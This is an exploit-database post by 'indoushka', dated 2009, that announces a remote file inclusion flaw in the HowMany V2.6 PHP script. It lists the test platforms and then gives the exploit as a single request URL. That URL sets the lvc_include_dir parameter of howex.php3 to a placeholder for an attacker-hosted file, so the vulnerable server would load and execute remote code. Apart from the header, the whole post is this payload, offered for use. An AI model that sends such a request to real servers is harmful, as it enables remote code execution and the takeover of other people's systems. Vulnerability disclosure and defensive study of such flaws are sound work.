id: 10417
date: 12/26/2009
title: HowMany V2.6 RFI Vulnerability
author: indoushka
cves: 

==============================
HowMany V2.6 RFI Vulnerability
==============================

========================================================================================                 
| # Title    : HowMany V2.6 RFI Vulnerability                                          |
| # Author   : indoushka                                                               |
| # Script   : HowMany V2.6 http://www.scripts-zone.com                                |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : RFI                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1-http://server/1/howex.php3?lvc_include_dir=[EV!L]



#  0day.today [2023-03-25]  #